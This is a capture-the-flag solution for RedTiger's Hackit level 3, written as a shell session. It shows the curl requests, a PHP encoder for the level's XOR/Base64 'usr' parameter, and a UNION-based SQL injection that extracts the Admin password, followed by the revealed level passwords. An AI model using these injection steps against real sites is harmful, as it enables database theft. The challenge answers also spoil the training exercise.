# RedTiger's Hackit wargame: Level 3


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 /**
  * Encode a string in the format used for the level's "usr" URL parameter.
  *
  * Every byte of the input is XORed with the fixed constant 192, rendered as
  * a three-digit zero-padded decimal number, and the concatenated digits are
  * Base64-encoded.
  *
  * Despite the name, this is a keyless and fully reversible encoding, not
  * encryption: it uses no secret, so anyone who knows the algorithm can
  * produce or decode values. It therefore provides neither confidentiality
  * nor integrity for the parameter it wraps, and whatever consumes the
  * decoded value still has to treat it as untrusted input.
  *
  * @param string $str Raw bytes to encode.
  * @return string Base64 text of the concatenated three-digit codes.
  */
 function encrypt($str) {
  $length = strlen($str);
  $digits = "";
  $pos = 0;
  while ($pos < $length) {
   // XOR with 192 keeps the value within 0..255, so three digits always suffice.
   $code = ord(substr($str, $pos, 1)) ^ 192;
   $digits .= sprintf("%03d", $code);
   $pos++;
  }
  return base64_encode($digits);
 }
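 // Require the input string explicitly. Without this guard a missing argument
 // raises an undefined-index/array-key notice and passes null on to encrypt().
 if (!isset($argv[1])) {
  fwrite(STDERR, "Usage: myurlcrypt.inc <string>\n");
  exit(1);
 }
 // Print the encoded form of the first command-line argument, one per line.
 echo encrypt($argv[1])."\n";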
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>
